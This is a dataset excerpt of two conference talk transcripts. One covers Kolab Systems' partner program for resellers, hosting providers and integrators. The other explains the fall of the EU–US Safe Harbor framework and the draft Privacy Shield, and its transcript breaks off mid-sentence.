doi
stringlengths
17
24
transcript
stringlengths
305
148k
abstract
stringlengths
5
6.38k
10.5446/54586 (DOI)
Look about the partner program that Colab Systems is developing around Colab in general. What it is, why we're doing it, and where we are with it right now, etc. So the subtitle accelerating into the market together probably gives you a good idea of what we're trying to achieve with this. Is this plugged in? Sorry, a moment. That's okay. I can... Nope. Let me see this. Alright, so we've talked yesterday quite a bit about, as Georg mentioned in the introduction about the missing freedom online. And that's kind of one of these really ironic and sadly ironic things that the internet was once held as a beacon of change that people would be able to communicate freely. We would democratize the ability for people to publish information and store information and transmit it. And it would just, yes, people would be empowered from the bottom up. And instead, the internet has turned into the world's best and most advanced surveillance engine that we've ever built, which is tragic. And with our mission with Colab is to, at least in the area of collaboration, thank you, in the area of collaboration to address or try and address those problems directly by giving people a open and free means that is secure, that isn't backdoor, that you can choose where your data is on your own servers or not. So we're choosing to address that problem head on. As a small-ish company and a product that doesn't quite have the same number of users as, say, Gmail yet, bringing that to the world at large is a really big task. It's a huge task. There's also an immense amount of commercial opportunity out there. So not only is there a good fight to be fought in terms of returning freedom to people that we all deserve and should have, but there's also the more pragmatic there's money to be made. And addressing those two issues on a global scale or even just in Europe is something that we feel there's only so fast and so far we can do it on our own without the participation of others. So after we've got Colab 3 on its feet, it's deployed in some very large areas. The name recognition on the world is reasonable. We get commercial requests continuously every single day from around the world looking into Colab. So we've raised awareness, we've proven that it works in the market, and we feel that at this point it's time to be working with others as well in those two goals of bringing freedom and Colab into the market. And we feel that by having a proper partner program and extensive one focusing on that, we'll be able to achieve these goals much faster and on a much larger scale. And there are numerous reasons for that, and it's not just, it's not only size. If you go to Colab now, it's, you know, the pricing is reasonable, but it's definitely Eurocentric in its pricing or North American-centric as well. If you go to, say, Brazil, you have multiple issues there with the cloud hosted version of Colab 1. The economy is different, so it's in real value terms more expensive there. And then getting support in your time zone, getting support in your language, getting support that is culturally attuned to you as a customer is difficult for us as a European, Central European company to provide. So we've started to look at how can we work with others, other companies, other interests, other communities to bring Colab into the market. And we've gotten to the point where we've actually, we have a few of our first partners in these veins, and we're working now the rest of the year to roll this out in a very large and coordinated way. And so we're going to take a look at both the definition of the partner program, who we're looking to work with, what each of these types of partners will be doing or can do with us and what we can do with you, as well as some of the details of when you become a partner, what you get out of the deal as well. So in addition to just being a partner with Colab systems and in Colab, we have a larger ecosystem as well around us, such as we've been talking a lot about PowerA to this event with IBM and their partners as well. And so when we bring in partners to work with us on Colab, we're actually inviting you into a much larger space and a much larger ecosystem that has the likes of IBM and Red Hat and behind it. Who here has seen, I know that all you guys were at the Taster events, but who here has seen the Colab Taster events online? So for those who are shaking your head, if you go to Taster.colab, colabsystems.com, you will see these events we've done over the last few weeks in coordination with IBM and Red Hat, focusing on the open stack from the hardware through the operating system up to the application stack. So we talk about partnering, keep in mind that this is not only with us, but our broader ecosystem and our set of partners and technology delivery partners as well. So we broke the larger partner concept into three very specific defined markets and profiles of partners. And you'll notice they map quite nicely actually to how we deliver Colab in general. So at Colab Systems, we deliver Colab in basically three basic packages. One is on site, it's your server. You say where it is, we put it on there with you for you or you can yourself. So you have on site delivery. We have hosted instances, so you can have your own dedicated instance that you don't worry about, you don't know management of, no backups, it's all handled for you. So hosting. And we also do the Colab Now public cloud, where you can go on and put your email accounts in with a larger pool on infrastructure that we manage for you as well. So the first, and that's our software as a service offerings. And so the first class, if you will, or type of partner that we start to work with are resellers, just straight resellers of the software as a service. So these are groups that can take the product we already have online and re-bundle it, repackage it and deliver it into their market, to their target audience, allowing for both vertical application of it, but also regional application. So has everyone here seen what Colab Now looks like, user interface-wise? Yeah, oh yes, you've all seen it over there. That's right. Oh yes, we have demonstrations. True enough. So just keep that in mind, because I'm going to show you what our first big reseller, we have three resellers now, but this one is I think the more exciting one. They're right in the middle of doing their official launch right now. If you were at CBit and visited us there, you would have seen them. And that is Secure Swiss Data. So this is their white-labeled version of, or entry point to, the Colab Now Cloud. It looks completely different. It has a completely different message to it. And this is their messaging. They're really focused on the primarily the North American, but also European audience. So they've got a bit more of an edgy approach to it, which is really nice. Also beautiful pictures of mountains, because it's Swiss. But this really shows the possibility. If you looked at it, you would go, well, okay, this looks like Secure Swiss Data. All they're doing is simply reselling the software, the services that we provide. They don't manage any servers. They don't manage the billing backends, et cetera. We work with them to do that. They turn around and resell. They've actually defined their own packages, so that if you go to Colab Now and sign up, while the feature set is the same, what comes included and what the names of the default packages are, vary. So we really are able to, from the service level all the way through to presentational wide label or customize for our resellers. Within that, we obviously have a revenue sharing model. So the reseller is free to set the pricing that they want. And then we share revenue from there on a case-by-case basis. So they're actually reselling both Colab Now Public Cloud as well as hosted instances. So the full software services suite. The second class of partner that we defined is ASPs and ISPs. We lump them together because from our perspective and how we deliver to them is the same, even though they have different business models and different audiences that they cater to. So the application service provider and the internet service provider market. Essentially what we do for them is help set up their own Colab Now, but on their servers, under their management, et cetera. We provide technical training. We provide sales training to them as well. We consult as to how it should be set up, how do you manage it in the long term, make sure that they deliver a quality service to their customers and their clients. Again they're free to set their pricing. We have also a revenue model for them where the more seats they have, it obviously descends down to a very affordable per seat price. The pricing for them is based purely on active seats and their installation. No base level entry fee to pay up front, which is refreshing to many of them because they're used to more of the Microsoft model where you pay a whole bunch of licensing fees just to get going and then you start paying per seat. But free software to the rescue, it's purely based on per seat. So they get the ability from us as the experts around Colab to deliver instantly a high quality service that they own. And this has become more and more interesting to this segment of the market in particular since Microsoft has moved to Office 365. And they're pushing people towards Office 365 and their solutions. They say, no, you can edit your office files there. You can have your Skype-based virtual VoIP system. And so what's happening for a lot of these companies is that Microsoft is coming in just scooping out their customer base from them to the point where, especially for ISPs, they just become a pipe and nothing more. There's nothing to differentiate them from their competitors. They've lost a very important way of building a relationship and retaining customer loyalty. And so Colab fits into that very nice area where we have a proven, scalable solution that you can manage quite effectively and affordably, but it gets you away from these larger companies like Microsoft and Google that are essentially trying to take your customers away from you for all intents and purposes. So as with the example of Swiss Secure data or Secure Swiss data, we have a ASP partner in Switzerland, a Vectris. They were a, used to be many years ago, the IT departments for four different energy companies in Switzerland. And the energy companies looked at it and went, well, we're not IT companies. This is silly. So we could, if we just put them all together, kick them out the door, make them a for-profit company of their own, they can deliver the same services and we might even make some money. They're now in the main engineering building. They've got 400-some-odd technical people. So you just add the management and sales on top of that. They primarily service the energy sector in Europe, energy sector companies in Europe. They do have customers in Asia as well. Interestingly enough, a Vectris is one of the five Microsoft Platinum partners in Switzerland. So they're one of the top five Microsoft licensees in the country. They had one guy on staff who had Linux expertise officially. And so when we walked in and they asked us to come in, we demoed our solution next to others, showed how the model works for partnership and how, due to the nature of free software and open source, they just get benefits. They wouldn't get elsewhere. And they went, okay, great. Only problem is we have no Linux infrastructure. We have no Linux expertise. We want what you have. Can you help us? And we're going to go through the course exactly what we've done. Originally they were planning on deploying it on the Windows, the Microsoft virtualization platform. That's what they deliver everything else on. We got it set up for them on that platform. They said, well, can we hook it into Active Directory? We said, yes, of course. Here's how it looks. We worked with them to do that. But then they took a step back after this is all done. They crunched the numbers. They said, the funny thing is the Hyper-V platform is going to be the most expensive part of the solution now. With our other Microsoft or proprietary, not just Microsoft, proprietary solutions, the licensing of the proprietary solutions just hides the virtualization layer. It's just not an important line item. But suddenly with Colab, both because we can run it on less hardware, fewer resources, fewer people to keep it up as a result. And because of the very good model for the perceived licensing, suddenly the virtualization platform they're paying for was visible in the budget. And they said, can we get rid of that? And we said, yeah, you could. You could move to an entirely Red Hat Enterprise Linux solution. I guess what we do. We could put the virtualization on there. So they actually built out an entirely new hardware solution specifically to run Linux. They've hired a few new engineers that actually have Linux expertise. So this has been a really interesting journey with them. We walked in and said, yes, we can make it work in your environment on the choice of your platform. We can do this. We showed them we could do it. But then at the end, they turned around and went, no, we're going to do it your way anyways. We understand now why you've picked Linux as your base and built on that. This is a really nice example. So one of their first customers that they've rolled this out to, they're using it internally, but they're also using it with their customers. And they're offering it as an alternative to Microsoft Exchange. And the first customer, they didn't want to migrate everybody off, a few hundred accounts that were on the Microsoft Exchange, because that's disruptive. So they're actually running it in parallel and all the new accounts and all the people that were moving off of an older system are in Colab. And while the 100-some-odd seats are still in the old Exchange, they don't have to deal with transferring data. And the people just use it together. We went in, we trained their support staff to do basically handle first level, second level kind of requests. We actually got another set of training coming up next week, actually, with them to help their engineers understand how to do more complex maintenance things. And so we're there with them all the way along, including for that one customer that they've already rolled out to, we provide a white label presentation branded with their customers branding. So they have a version that they, with its branded for a Vectris, their logo, their colors, it looks like, you know, a Vectris, but it's just powered by Colab. And then when they deliver it to the customers, we again help them white label that for each customer. So each customer gets this beautiful, tailor-made solution. And they're able to deliver that at a lower price without the fear of Microsoft coming in and stealing them off to Office 365. The third sort of, or third class of partners that we're working with are integrators. And these are your typical IT, often very regional, ranging in size from a few people working out of a small office to international with thousands of IT specialists who go into companies that need IT, which is everybody, and sorts out their IT from printers and laptops to server-side software and everything, often everything in between. We're working with integrators to help them add Colab to their suite of offerings so they can walk in and go, yes, we can set up your Windows machines, yes, we can do that, we can put your printers in, great, we can do your networking, blah, blah, blah, blah. We can also provide your VoIP and now they can provide a proven open-source collaboration platform. And again, just as with the first two categories of partners, we have a revenue model that is standardized that keeps everybody very much incentivated to sell and support and keep our customers, our combined customers happy. And so with these three different groups or types of partners, we're able to, currently and in the future, to really broaden our impact and reach new audiences. With resellers, we get to hit the consumer market a lot harder and a lot with a lot better coverage. With the ASB ISP customers, we're able to get into the hosting environments a lot more than we could ever do on our own. And with integrators, we're able to mobilize with our partners on the ground, if you will, Army of IT specialists that can bring Colab into your local town, your local cities, governments, companies, et cetera, et cetera. And just as with the previous two, we have a support system for them as well. So to talk a bit about how we support and what we offer to integrators in specific, I'm going to invite Peter Lemkin to come up, who is with Colab Austria. We just recently officially opened an office in Austria due to demand and interest there. Peter is heading that up and is a partner manager for us as well. So he's got a fair amount of information to share with us about how we plan to help our integrators. Okay. Yeah. Still good morning. It's one minute before noon. Thank you for the introduction to that. Integrators, in a general sense, Aaron has already given the overview of that. What I'd like to focus on is the local and regional aspect of it, because, just to give you a short background on me, I've been working for another open source company for the past four years. And in that capacity, I have worked with local integrators all over the world. I managed to get new regions. I worked for a new company in Israel. I worked the region of South Africa. I worked in the UK and Ireland. And the idea for CoLab to move over to Austria actually came from a customer request from a big, large institutional customer from the government, and who specifically said, yes, we would like to work with CoLab, but we also need to have a local integrator that you are working closely with and that you have good collaboration with. And so we can feel secure in having local support and local people to talk to so that we feel secure in having our infrastructure set up by a local company. So enabling a local customer is actually what all this is about. So what I'd like to talk about is the question of whether can we scale up as CoLab headquartered in Switzerland and manage all the regions on the planet that are interested in CoLab? The answer is no, we can't. Not without local integrators, not without local partners that support us, that are interested in pushing our message forward and that are interested in actually pushing the product and enabling us to get new customers. I'd like to get a little more specific about how we did this in Austria, how this worked out in Austria and how we believe that scales to other countries as well and how we can actually win a lot more new customers with local partners. So that's the idea behind it. You haven't actually shown me, can I move on from there? All right, we've got the partner benefits. And I'd like to just give you an overview of what we have designed as part of our partner program and I will give you some examples of how we did this in Austria, how we'll continue to do this in Austria and in a later stage move this on to other countries. So selling the product actually is the most important thing because without getting new customers you will not be interested, no local partner will be interested in actually working for us together with us. So what we'll do and what we continue to do already is to enable them in terms of sales support and training. So how do you sell an open source product? Well, you can't because there is no licensing fee, we all know that. So what you have to do is to make a customer understand that there is added value in using an open source solution and using the support and the technical knowledge of the company behind the product itself. So it is talking to the customer, it's talking to our partner and making him understand what we stand for, what our values are, what our technology is able to do and what that really gives the benefits to his own customer. There are a lot of regional aspects in that and let me give you a small idea about doing business in Austria. As most of you know, I'm not Austrian, I live in Austria but I'm a German and even if I had lived as a German in Austria for the past 20 years, which I have not, I would not be privy to all the intricacies of Austrian politics, Austrian policies and Austrian personal involvements and all the connections that are going on. For that, you need a local partner. Now, Austria may be very, very close to Germany and Switzerland but if we are talking about other regions like Israel or India or Australia or whatever, you will always find there are regional specifics that nobody else than a local partner can actually handle. By handling means actually selling our services and products. We are really, really depending on the local partner and integrator. What we are doing is we are giving them the training to make them understand what our value proposition is in terms of open source software and our services and then make him translate that to his regional market and actually make his customers understand why Colob is a good choice, how we are positioned against our competitors and how we are managing to move forward and actually win and make money with us. That's what he boils down to. Every local integrator wants to make money and needs to see our support in making them translate that into their local business. So that's the part of sales support and training. Now, we have had the Colob Taster, as you know, we have had that in Zurich, we will have that in Bern next week and we have just had one in Vienna and Vienna was really a prime example of really entering a new market. So we gave our local partner, which we have, the opportunity of talking to his customers through our marketing assets. We do this in collaboration with IBM and Red Hat, so the event was actually covered. So the task was to go out and make contacts to the local customers in Austria, make them understand, hey, there is a new kid in town, just visit us, get an idea about what we are doing in a technical sense and get an idea of how we collaborate with our local partners and our technology partners like IBM and Red Hat. So they are getting professional marketing assistance. We have a continuous effort going on and standardizing our marketing efforts. We have a great guy on board who actually does that very, very well. And so this is how we are able to provide a package of marketing support that many other open source companies do not have in that comprehensive level. All right. Now, the technical support and training is probably one of the most important aspects of this. If you have a local partner and a local integrator who just is not a reseller, but actually an integrator, he needs to be technically savvy. He needs to know what he is doing. For the simple reason that we as a company, we cannot scale up to actually serving all the end customers. So the requirement for us is to sign up a partner who is able to do a level one and level two support. And us always being in the background and being available on a very high service level to actually solve real technical problems that a regular engineer cannot handle. We are talking about source code level support. This is what we can provide to them. So we are providing the kind of technical expertise to our local partners. And we are able to do that on a very high level. We have certifications coming up. This is all still playing out in the future. This is what I am working on with Aaron. But in the end, we already provide the kind of technical support for a local partner that he feels confident in implementing and supporting his customers. All right. This again goes back to marketing. So exclusive monthly updates by newsletters is just giving a local partner an idea of where are we moving? Or are we moving at all? Yes, we are. We are winning new customers. We are giving updates about our technology. We are giving an overview of where we are going, what our roadmap is, and stuff like that. We don't want to overdo this. So a monthly newsletter is going to be comprehensive. It's going to be short. But it's going to be having interesting information that will enable a partner to talk to his customers and say, hey, something new has come up with CoalUp. They are doing some really interesting stuff. RoundQube2 is coming up. CoalUp is a male client is coming up. And there is going to be stuff that you will be really excited about in the upcoming months. All right. So one of the things is, as an open source company, we are heavily dependent. No, we are actually addicted. And we can't do without the community. Right? So the community as a development and support and as actually moving forward the development in terms of roadmap and stuff like that. We want to do that on our partner level as well. What we are trying to do is to find a point of where our partners do not interact with us directly, but interact within their community as partners as well. They are talking about their regional aspects. They are talking about customers that they have and exchanging themselves. So we want to take ourselves back. We just want to provide a platform for our partners to interact, which gives them the opportunity to actually find out what can I do as an integrator? What have you done? Do you have an example of how you did it with your customer? So this is our plan. It's not implemented yet, but it's still on the roadmap. But this is something that we are going to do. A lot of that, by the way, is still work in progress. But it's cool to actually be working on that and trying to get feedback from our existing local customers and local partners and trying to scale that to new partners, winning them and making them understand that working with call-up is actually a cool idea. Just as Red Hat tries to offload a lot of their technical expertise on a non-personal level, we are trying to work up on a knowledge base. That knowledge base is designed to be available to partners only. Because those are very, very practical things that our partners have already started implementing. They are working with their local customers and they encountered problems, they encountered challenges and they came up with cool new ideas. We want to do is to make that available to all of our partners as kind of an online knowledge base. The co-marketing actually goes back to anything related to marketing. We luckily have somebody who actually is really, really heavily involved in marketing, creating an identity of call-up that will enable a partner to be part of an ecosystem within themselves. Creating co-marketing opportunities in one place will give us the opportunity to do that in 10 places and 50 places all around the world. This is what we are targeting at. The technology ecosystem, you have heard about all the things that we can do on the server side like the PowerAid system that we have had a vast experience with now which is a cool and new technology. We are working on the new technologies like RoundCube2 and Q as a mail client. We want to inform partners about that as early as possible because that makes them interested in telling their customers, hey, something new is coming up. We are reaching out to potential new customers and we are reaching out to new potential partners by having them in our ecosystem as well. The last thing is actually one of the most important things is to have online capabilities as much as we can. You may remember like 10 years ago, the service-oriented architecture was a big thing. Everybody talked about that. Very few people actually implemented it. It is our idea to give our partners and our big customers the opportunity to self-service them, selves as much as possible. Also this is still a work in progress. We have very cool ideas coming up from Aaron and from the rest of the company to make it as easy as possible for a partner to interact with Colab. To interact with Colab is a business partner because in the end it all boils down to money. You want to spend at least a very little time in interacting with your provider of software. You want to do as much for yourself as you can and we want to do that by actually do all the online purchasing, subscription management, reminders of when your subscription is running out, we want to do that online as much as possible. Having exclusive access into our partner ecosystem as part of our website is going to be one of the steps that we are going to be implementing at the end of the year. A lot of things really going on. As you can see, I'm still struggling to give you very, very many specifics. It's all a lot of work in progress, but we are pretty much on the same page of where we want to go. Where do we want to go? We want to have a worldwide partner ecosystem that spreads out the message of Colab being the really, really cool thing in terms of open source and replacing existing technologies with a different business model. In the end, which is the most important thing, if you work with Colab as a partner, you have the really, really big opportunity of making lots of money because we are individual. We can talk to us, we can design our business model around your requirements as a local partner for your customers and really servicing big infrastructures as we are doing in Austria now. That's what we are going. Still, a lot of work to be done, but it's an exciting thing to be part of actually working on that and trying to find out how we can best work with our partners to make them happy, actually make a lot of money. This is what it is all about. I hope to be part of that. It's cool to be part of that. Thank you very much. Thank you.
Aaron stayed on to explain the different types of partners we work with, and how resellers, ISPs and integrators were using Kolab to offer more and better services to their clients, while cutting costs and boosting business at the same time. Peter Lemken, Account and Partner manager at Kolab Systems Austria, then went into much more detail as to how Kolab Systems helps and supports partnerships with integrators (starts at 20:00).
10.5446/54587 (DOI)
that I actually initially drafted the slides in German and the thinking that went into it was in German. So I translated it. It will probably in parts not appear entirely professional the way it is now, but I hope we get through it properly. It shouldn't matter too much because it's strange language stuff anyway from the beginning. Thank you for the introduction. It's actually a very good point and I can start with that because if the UK or parts of it, who knows, actually ends up leaving the European Union, it might still be in the end part of the European economic area, so it might end up with a status something like Norway or Switzerland does, so that in terms of data protection, the European economic area at this point is more or less the same, shall we say, as the European Union. But it might end up, and people are pushing for that, it might end up having a special status, the best of both worlds stuff, and that may end up with the UK not being part of the European economic area, and therefore it might well need a UK privacy shield, because this is what this is about, transferring personal data in terms of its legal meaning to countries who are not part of the European economic area. And to start the whole thing, it doesn't make a whole lot of sense to me to look at what the privacy shield is or what it might be once it's done without really starting with what caused the whole problem. Why do people have to work so hard to come up with something so complicated? Why is that? There's a history, a certain formal legal setting that requires that, and I will then only briefly spend some time at what other ways there are to transfer data there, and we'll then end up at the privacy shield and trying to have a look at what, not in detail, but what in principle is written there and how it is supposed to work and where we stand in the process. The core of the problem is that from an EU law perspective, the EU is good, or the EEA is good, and everything that happens within that, those territories is good and uniform and assessed as okay, and therefore there are no problems with cross-border data transfers within that area. But consequently, everything that is outside that area is, we don't know how bad it is, but that, us not knowing, means that we have to treat it as bad, as forbidden territories, if you will, so you can't transfer data there unless certain conditions are met, and those conditions, there are some statutory ones, and I'll get to those that sound good, but hardly ever apply, and then there is the more muddled stuff that you may have come into contact with that are called monoclosis, and with a view to the United States formally, Safe Harbor principle, the Safe Harbor framework. The idea was that essentially the EU was looking for a way to counter its own, the problem that it created itself by saying everything outside the EU is bad. So it gave the Commission the power to make decisions with a capital D, so it's a formal way to get there, which basically has binding power on the member states, and that decision can be that in a particular country, third country, the level of data protection afforded by the laws, the system, the whatever, is actually sufficiently adequate in comparison with what we have in the EU to say that data may actually lawfully be transferred there. The EU has, and I'm actually not really speaking rather freely, I suppose, not really sticking to my slides, the EU has made a number of decisions to that effect where it has said that certain entire countries are actually OK in terms of receiving personal data from the EU. For example, Argentina, Switzerland, Israel, and Uruguay as well, and some other, well, I think one or two more, which kind of transported those countries to take part in what we like so much, which is our data protection realm in the EU. And that did not work with the United States. I mean, they could have tried to go the same way, but they did not, because I'm assuming, I think nothing has ever been published to that effect, but I'm assuming that the Commission couldn't quite come to terms, and I couldn't quite arrive at the conclusion that the general statutory data protection level is actually comparable to the EU. So what they did was they, well, created a framework, and it's called Safe Harbor Framework, it's just a catchphrase. They created that, and what it was, it's an adequate, you know, it is a decision that basically said, well, the country itself is not adequately protected, but if companies that process data in that country, or had its seat in that country, if they adhere to certain principles and self-certify accordingly and register for a list, that those, you know, not the country, but those companies were actually safe places to receive personal data from the EU. And it was always a bit flimsy, and there had always been years, and especially in the last five, six years, has been a lot of criticisms saying that the framework doesn't work, and no one's ever looking into it, and it's just a smoke screen, and so on and so on. And that criticism, obviously, or criticism, you know, without anything else, doesn't change anything, so we needed essentially a court case for someone to look into that. And Mr. Schrems, I don't know, a guy from Austria, you probably heard of him, took it upon himself, not only in this setting, but very generally to take it to Facebook, basically, and, you know, go down all kinds of roads to, well, whether you like it or not, proclaim that Facebook is essentially abusing the user's data and so on. And one of the roads he took is he complained in Ireland to the local data protection authority saying that, because Facebook, Europe has its seat there, and he basically said, you got to do something, because Facebook, Europe, you're the competent authority to do something about it, and you can't just look, you know, at all those wrongdoings that happen in your country. It's your job. So, and then the authority did look at it and came to the conclusion that everything is okay, and where maybe things are not okay, they couldn't look into it because, you know, the data transfers from Europe to the United States were, shall we say, protected by the Safe Harbor decision made by the Commission in 2000. So they said, well, whatever we may think, there is the Safe Harbor principle, and we got to stick to that. We can't make our own decisions in some respects, so there you have it. But they recognized, and I then went to the court in Ireland, and the court in Ireland said, well, we got to bring that up to the European Court of Judgment. The Court of Judgment, European Court, ICT, the Court of Judgment, that's what it is. And the court came to the conclusion that, indeed, the decision that is the Safe Harbor framework, the Commission decision is, in fact, invalid, and it thereby simply no longer exists. It's history, you know. And what that meant was that one of the most used fundament for transferring data to the United States was thereby gone from one day to the next, basically. So ever since then, people have been trying to work at replacing the Safe Harbor framework, and that ends up being the privacy shield we get to that. And as you can see in the timeline, actually, when it comes to business, people start to work rather swiftly, normally everything in terms of, you know, EU legislation takes years and years and years. And as you can see, people had started to work on stuff in 2013, essentially. But when you look at the timeline, it is not even half a year after the judgment was passed that the United States and the Commission agreed on a draft for a replacement of the Safe Harbor decision, which will now probably be the EU privacy shield decision. So it's the same setup. Essentially, it's just called differently, has different rules. And people have had a chance to voice their opinions, which mostly have been rather critical of what the draft says. And latest stuff in April. And currently, negotiations are ongoing. So we're still working with the draft that we got in February this year. But it is known that negotiations have been ongoing, people have been working on the wording of the decision, the draft decision. And it is currently in the article 31 working group. That's where it's placed. And it's actually working both times. As I just now see, and that features the representative of the member states and the article 31 working group needs to essentially consent to the decision. Otherwise, it can't be made. That's what we stand. But the plan is actually to have something in place, a final draft with everyone's consent in August of this year. So it's two months to go. And now when we look at the future of that, the privacy shield may or may not have. We need to think about, well, what made the court, European Court of Justice, actually say that the safe harbor decision is invalid? Essentially, the EU law prescribes that if the commission wants to decide that a country or a certain framework is actually adequately protective of personal data, it needs to assess the state of the law in that particular country in depth, comprehensively. And the ICOJ did not say that the state of the data protection laws in the United States is bad. What they said is, commission, you didn't look at it. You just came up with something without actually taking a look at what you're actually deciding. You have to assess the laws and you didn't do that. So for that procedural problem alone, the decision, say, the decision is invalid. And secondly, what they said is that the member states have independent data protection authorities. They have to be independent at the core of the whole thing. And no commission decision can restrict the decision making power and the power to investigate a case just because it thinks that the state of the data protection laws in other countries is actually adequate. That takes away from the independence of the data protection authorities. So that was the second problem. And the result is that since the Safe Harbor decision is gone, the United States is as bad a country in data protection terms as any other country in the world, regardless of how it actually is. And all data transfers that have relied on Safe Harbor are essentially unlawful now. And what did it next? It has been, I get to that, but of a grace period, but that grace period ended at the end of February. So at this point, you can't just transfer data to the United States. It doesn't matter how well regarded or whatever your recipient company is. You need to do something additional to be allowed to transfer. And that is, and I'll have to briefly mention that because they've been in the press as well. And one of those influence, the only influence that the only instrument that you can actually control as a company or come up with yourself, use yourself, is the so-called EU modern clauses. You will probably have heard of that. It's the same thing as in German. It's usually off-talk start and follow, but it works differently. But it's kind of like the, shall we say, equivalent of that when it comes to data transfers from, for example, Germany or France or whatever, to the United States. But here the differences begin at this point. The modern clauses don't relate specifically to the United States. It's any third country outside of the European economic area. So that makes it different. And it's a set of contractual clauses. It looks like an agreement. It starts off. It has a lot of clauses and it ends with signatures and certain appendices. And, you know, one can like him or not. They're a different kind of instrument. So what we've had, what we've read a lot over the past months in even qualified, shall we say, papers, you know, is that the fact that the safe harbor framework is dead also means that the EU modern clause idea is dead. That is not the case. It can't be because it works completely differently. The only thing that we can think about is whether some of, one or some of the accusations that the ICJ directed at the commission kind of applies by analogy to the EU modern clauses as well. And that could be, of course, the non-assessment of certain status of data protection law. But that is obviously not the case because the very idea of the modern clauses is that in the recipient country there is no adequate data protection level. Otherwise you don't need them. So there is no, there is no requirement for the commission to assess a certain state. All they have to do is come up with a set of clauses that in themselves or by themselves allow for a sufficient amount of trust that the recipient company will treat the person data as prescribed. So there is no direct spillover. And I don't know, I don't know if you've heard of that, heard about that discussion, but a lot of people say, well, you can't transfer data to the United States. There is no, at this point, there is nothing, no tool that you can use to make that happen. That's not true. And the authorities have admitted as much. I mean, if never really like the modern clauses, you know, the member state authorities, but they can help it because it's a commission decision that at this point, at this point is, has a statutory power. So it's binding. You know, no member state authority can say, I don't recognize the modern clause framework. But those remains remain for now. But people have been trying and there is at least one case underway. It seems to bring the modern clause questions, whichever they may be, up to the European Court of Justice as well. Because it's the same impetus that people have, you know, saying, say, if Harvard doesn't work, modern clauses don't work. And the only institution that can say that is the court. So let's bring it up to the court. So what I can tell you is for now they exist, but they may not forever. I'll skip the alternative instruments, by the way, because they're not really interesting. Of course, if an individual says, like, really freely and expressly consents to data being transferred to the United States, that overrules everything. But the question, in no case as always, is it really a free and informed decision? And the authorities, for the most part, rightly or wrongly, tend to assume that if it's a big company on the one hand, and the individual on the other hand, it's never a free and informed decision. Plus, for the most part, they, you know, they don't consider the privacy policies that are published on the websites sufficient information. Because, at least for the most part, you know, if you look at, and I'm certainly not like a Google or Facebook hater, but if you look at the privacy policies that they publish, you don't really learn a whole lot when you read that. And I write those things. And so, yeah, it's rather opaque, as Boris Johnson would say. Yes, well, he is opaque. We all know that. Just today we've learned that. Sadly, I might add. And what the data protection authorities have done is they have granted a great period up until the end of February of this year. That's gone. So if companies and thousands and thousands still do rely on safe harbor, they're actually committing an unlawful act. And in Hamburg, the local DPA has kind of tried to set an example by actually handing down administrative fines. They're not particularly high, of course. It's more like a symbol. But they did that to make it clear to companies that when they mean end of February, they actually mean end of February. So they started proceedings immediately afterwards just to make the point. So safe harbors really died. Now, onto replacing or trying to replace safe harbor with something better, something that the court of justice may possibly actually allow. Because, of course, the privacy shield once it's done will be brought up to the court of justice as soon as possible by someone. So that's for sure. It won't last unchecked as long as safe harbor has. Safe harbor was in place for 15 years. And the new framework will be tested, I'm assuming, within the first one or two years of its existence. Now, what are people trying to do? When we talk about replacing safe harbor in a formal sense and how it is structured, it's actually rather similar. So again, it will be a commissioned decision with a capital D, binding upon the member states that says that if companies comply with a certain set of principles, and if they set up themselves in certain formal ways and register for a list and do this, that, and the other, self certifying themselves, they are suitable recipients for personal data from the U. So it's the same basic idea as safe harbor was. They're just trying to do a better job, whether they've done it is a different question. What we know at this point, and I can only say we've got to be a bit cautious, we have an outdated draft of the end of February of this year. And people are working rapidly on the whole thing. So even though it hasn't been published, we can assume that there is a more current state of the draft that will at least in part look differently. So I don't know what's going to be in the private shield decision at this point. But probably the general setup was the same and the way it's supposed to work. So a lot of stuff, a lot of text, 35, 40 pages where the commission explains how it came to its decision, the background of it, the principles behind it and all that. And the actual core of the thing will be placed in annexes. There will be an annex too that essentially contains the rules that people need to follow. And then there's a bunch of other annexes, six altogether, where certain U.S. authorities in letter form explain how U.S. law will work, how it will work also in context with the new safe harbor principles and private shield principles, and what they do to control it and what recourse people have in the United States. And there are different points of contact and all that. So it's not going to be a treaty where you have the TV cameras rolling and people get their fountain pens and you have flags in the background and people sign. It's going to be a piece of paper, essentially or online, I don't know, it's going to be paper, a PDF, published by the commission that kind of contains other pieces of paper where the U.S. says this is what we'll do to safeguard the entire framework. This is close to treaty by won't be. This is one of the criticisms, essentially, because people say it's anti-promises, essentially. So there's two, what will happen then is that if a U.S. company self-certifying itself registers for that list, it will be bound to the principles that a safe harbor annex two contains. There will be certain checks and safeguards, I'll get to those. But as a self-certifying process, in that sense, it's the same thing as a safe harbor, which of course leads to the corresponding criticism. And from a European perspective, what will also remain the same is that no matter how well or badly the system works in the United States, it will always be the company in Europe who remains responsible for what happens with the data. They remain responsible for the decision to transfer the data to the United States. If things go badly, they've got to stop it. So they can't say, well, we did everything right. What matters, what will matter is that the result remains right, and if it's not, it's got to stop. But that's nothing new either. That's the same thing as we had prior to 2015. So in terms of what the U.S. companies have to do, have to comply with, not that much changes. This is more wordings and the principles are more detailed, but the general way to handle this is the same. What does change is at least on paper, of course, the commitment of the United States government to actually look out for the system, to control it. And to get there, shall we say, the U.S. has required from their perspective a lot of information on how things work in the United States, in particular, of course, with a view to the intelligence community. Shall we say, and they have received information now, of course, we can debate for months and months and months, where that information is telling sufficient detail enough, but they have received 10, 20 pages by various authorities explaining certain things. And, you know, I'll go back to the accusation that the Commission did not assess the state of the data protection laws in the United States when it did say Fiber. That's essentially the way by which the Commission wants to make sure that this time it has assessed the situation with sufficient comprehensiveness. So that's what they do to protect themselves against, or try to do, to protect themselves against experiencing the same results before the court, another time, a second time. And that was one of the elements that was missing in say Fiber. Say Fiber was really nothing. Now, what they were trying to do when setting up the principles is they were trying, I use the word try on purpose, try to mirror, reflect essentially the current data protection directive that forms the basis of all the national data protection laws in Europe at this point. We'll get something else in two years, but for now that's the way it is. So they've tried to come up with a set of principles, a set of, you know, what do I have to do or what do I, can I not do when I'm in a company, and they'll write, there's simply a list. And I don't think it will be particularly fruitful to really have an in detail look at this point. What the principles wanted chief, and they don't, but they wanted chief is essentially, you know, kind of transferring our principles or regulation on data protection to the United States, which will never work. But it's an attempt. But when you read it, not this, but when you compare it to what we have in Europe, you, it takes five seconds to notice that it is not congruent. It is not the same thing. There's a lot of gaps. A lot of contradictions at this point. The way it's drafted at the moment, I, you know, I'm sticking my head out, but I predict that it will never pass an ICJ test. But then again, people have, I'm not the only smart guy in the room, so people have seen that. And I know that people are working on a text as we speak, and they have for the past three months. So this is not the final state of 